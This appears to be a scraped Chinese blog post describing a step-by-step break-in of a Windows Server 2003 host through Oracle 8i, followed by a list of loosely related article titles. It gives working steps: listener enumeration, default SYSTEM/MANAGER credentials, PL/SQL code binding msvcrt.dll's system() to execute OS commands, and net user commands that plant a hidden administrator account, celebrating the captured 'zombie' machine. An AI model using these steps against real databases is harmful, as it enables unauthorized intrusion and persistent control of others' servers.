oracle 8i漏洞渗透,一次通过Oracle8i入侵系统之旅(组图)
最近看了些有关Oracle的安全资料,看后随手做了一个渗透测试,把过程记录下来方便日后查阅.先用SuperScan4.0扫描下要测试的主机,速度很快,结果如图1所示:
图 1
端口 1521 是 Oracle 的 TNS Listener 默认监听的端口,通过扫描报告还可以看到Oracle的版本为8i.现在还不知道对方的操作系统版本,看到主机还开放了终端服务,直接连上去看下操作系统版本.如图 2,
图 2
确定操作系统版本为 Windows Server 2003 企业版。Oracle 10g 之前的版本默认情况下是允许远程管理TNSListener 的,这台主机的 Oracle 版本为 8i,我们通过 TNSListenner来收集下更多的详细信息.如果本地安装了 Oracle 可以直接调用 Lsnrctl 连接到测试的主机,如图 3所示:
图 3
通过输入"status "命令我们可以得到 oracle详细版本(8.1.70.0),操作系统(Windows),跟踪级别为OFF(说明没 有开启审核),安全性为 OFF(说明没有设置Listener 口令),日志文件的绝对路径(判断 Oracle安装路径),数据库的 SID(ccdr).
要远程管理 Oracle, 需要知道 IP,数据库的 SID,和连接的用户名和密码.IP 和 SID我们已经知道了.接下来用oscanner 工具扫描下要测试主机是否存在默认的密码.如图 4 所示.
图 4
看来管理员安装完 Oracle8i 后就没有进行进一步的安全配置 , 所有的用户名密码都是默的.在Oracle中,SYS/SYSTEM 都是具有 DBA 权限的帐户,我这里选择使用 SYSTEM/MA NAGER来连接数据库.
在本地用 Sqlplus 连接到目标 Oracle 数据库,命令为:
SqlPlussystem/manager@//victimip:1521/ccdr
连接成功后,可以通过 PL/SQL 来运行 OS 命令,首先需要创建库来定位msvcrt.dll文件.这里需要使用完整的路径,通过刚才对主机的查点我们已经知道操作系统为 win2003, 如果系统安装到 C盘的话 , 那msvcrt.dll默认路径就为c:\windows\system32\msvcrt.dll.创建库的命令如下:
CREATEORREPLACELIBRARYexec_shellAS"c:\windows\system32\msvcrt.dll";
接下来写一个过程来调用 msvcrt.dll 里的 system()函数.命令如下:
CREATEORREPLACEPACKAGEoracmdIS
PROCEDUREexec(cmdstringINCHAR);
endoracmd;
/
CREATEOREREPLACEPACKAGEBODYoracmdIS
PROCEDUREexec(cmdstringINCHAR)
ISEXTERNAL
NAME"system"
LIBRARYexec_shell
LANGUAGEC;
endoracmd;
/
创建完后,就可以运行 OS 命令了.由于主机已经开放了终端服务,所以我这里添加个管理员,然后连接服务器.命令如下:
execoracmd.exec("netusermickeyimissyou/add");
execoracmd.exec("netlocalgroupadministratorsmickey/add");
帐户创建完成后,如图 5,就可以连接终端服务了,一台肉鸡到手了.:-)
图 5
oracle 8i漏洞渗透,一次通过Oracle8i入侵系统之旅(组图)相关推荐
- 从oracle 8i数据库渗透整个系统(可以直接上手)
从oracle 8i数据库渗透整个系统 最近一直在搞这个oracle 8i数据库的渗透测试,也算是成功复现了oracle8.1.7数据库的完整渗透过程.本文章仅供学习研究,如从事任何违法违规的事,一切 ...
- linux etc 漏洞利用,漏洞利用 | 看我如何利用Kerberos EoP渗透你的Linux系统
写在前面的话 在一次红队分析中,我们成功以非特权用户的身份在一个外围网页中实现了命令执行.本文将介绍并分析漏洞(CVE-2018-1685)以及该漏洞的利用方式,该漏洞允许攻击者读取目标主机中的任意文 ...
- 渗透测试-Kali入侵Win7主机
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径. 本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的 Win 7主机,从而 ...
- 常见渗透测试工具集成系统简介
0.Kali Linux.BlackArch Linux 1.BackBox BackBox是基于Ubuntu的,它用于网络上渗透测试以及安全评估,同时包含一些常用的Linux安全分析工具.它的功能包 ...
- oracle 8i安装说明,Oracle 8i for NT/WIN2000安装与配置
Oracle 8i for NT/WIN2000安装取配置 经过本章的教习您应该把握: l 服务器真个安装.服务的启动.卸载; l 客户端安装 l 客户真个衔接配置 l 国强财务硬件中帐套治理及情况配 ...
- 为什么APP需要做漏洞渗透测试服务?
为什么APP需要做漏洞渗透测试服务?现实生活中小企业面对的网络安全风险多种多样.而真正的隐患,是公司觉得自己自身非常安全,却不知道隐患早就渗透到里面.随着安全产业的发展和技术人员安全防范意识的提升,以 ...
- 优化调整Oracle 8i数据库
Oracle 8i数据库服务器是高度可优化的软件产品,经常性的调整可以优化系统的性能,防止出现数据瓶颈.我们通过调整数据库系统,可以使它达到最佳性能以满足用户的需要. 下面,笔者将介绍优化和调整Sun ...
- 利用CMS漏洞渗透并获取某服务器权限
利用CMS漏洞渗透并获取某服务器权限 在phpmyadmin漏洞与利用专题中,我们从多个角度介绍了如何获取webshell并获取服务器权限的案例和情形,但在实际渗透过程中还有一种情况,即服务器上存在p ...
- oracle 8i 数据库修复,优化调整Oracle 8i数据库
导读: Oracle 8i数据库服务器是高度可优化的软件产品,经常性的调整可以优化系统的性能,防止出现数据瓶颈.我们通过调整数据库系统,可以使它达到最佳性能以满足用户的需要.下面,笔者将介绍优化和调整 ...
最新文章
- 坐标系转换(镜像与对换)
- 自学python还是报班-没有基础想学python为什么一定要报班?
- LeetCode 651. 4键键盘(DP,Ctrl+CV)
- 【JAVA基础篇】注解
- 2018春节前新马泰游
- python的书籍推荐_python 书籍推荐
- ELK下Elasticsearch优化
- mysql存储过程详解 mysql存储过程和函数
- 如何使用UDP进行跨网段广播
- 计算机科学与技术有几大类,计算机科学与技术类包括哪些专业
- 2019-07-04:python音频处理库
- 文本数据的机器学习自动分类方法(转)
- 牛客网 - [牛客假日团队赛6]Mud Puddles(BFS)
- 论机器学习中数据的重要性
- 基于色彩恒常( color constancy)特性的Frankle-McCann Retinex图像增强
- 聚合收款码有限制吗?怎么办理?
- \t\t开心学国学(转载)
- Phonics 自然拼读法 ai, oa,ie, ee,or,j Teacher:Lamb
- 《鸟哥Linux私房菜》——第九章、文件与文件系统的压缩与打包
- 关于Autodesk软件安装问题
热门文章
- 谷歌Chrome 80稳定版更新:对浏览器进行两项重大的更改
- Status Code:200 OK (from disk cache)和304的区别,以及怎么禁止缓存
- 轮播高度_Qt编写自定义控件24-图片轮播控件
- gta5显示nat较为严格_一年内上涨近3000元/㎡!碧桂园翡翠华府物业管理严格到令人惊叹...
- POI读取Excel文件时,row.getCell(0).getStringCellValue()报错:数字转换异常
- 远程连接redis遇到的一些错误解决办法JedisConnectionException:java.net.SocketTimeOutException...JedisDataException:D
- linux下各种颜色文件的意义
- php中cookie存的是什么,PHP中Cookie存在的作用和用法
- mysql初体验学习笔记_【MySQL】mycli初体验
- sqlite插入时间字段_sqlite 获取最后插入id